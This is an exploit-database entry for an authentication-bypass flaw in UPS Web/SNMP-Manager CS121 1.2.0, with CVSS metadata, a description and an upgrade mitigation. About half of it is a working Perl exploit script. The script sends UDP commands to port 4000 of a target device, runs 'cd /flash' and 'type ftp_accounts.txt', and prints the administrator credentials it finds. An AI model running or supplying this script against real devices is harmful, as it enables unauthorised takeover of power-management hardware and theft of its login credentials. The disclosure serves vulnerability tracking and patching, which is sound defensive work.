UPS Web/SNMP-Manager CS121 Authentication Bypass Vulnerability

vendor:

UPS Web/SNMP-Manager CS121

by:

SecurityFocus

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: UPS Web/SNMP-Manager CS121

Affected Version From: 1.2.0

Affected Version To: 1.2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:ups_web:ups_web/snmp-manager_cs121

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

UPS Web/SNMP-Manager CS121 Authentication Bypass Vulnerability

UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability. Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. An attacker can use a Perl script to connect to the port 4000 of the vulnerable device and send a 'show syspar' command to retrieve the system parameters. The attacker can then send a 'start' command followed by a 'cd /flash' command and a 'type ftp_accounts.txt' command to retrieve the login credentials of the device.

Mitigation:

Upgrade to UPS Web/SNMP-Manager CS121 version 1.2.1 or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67438/info

UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.

Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. 

#!/usr/bin/perl -w
use IO::Socket;      
use constant MAXBYTES => scalar 1024;      

$socket = IO::Socket::INET->new( PeerPort  => 4000,
                                 PeerAddr  => $ARGV[0],
                                 Type      => SOCK_DGRAM,
                                 Proto     => 'udp');

$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n"; 

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

print "Searching login\n" ; 
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt"); 

while($socket->recv($inline, MAXBYTES)) { 
	 if($inline =~ /admin/ig) { print $inline; exit;  }
}

sleep(1);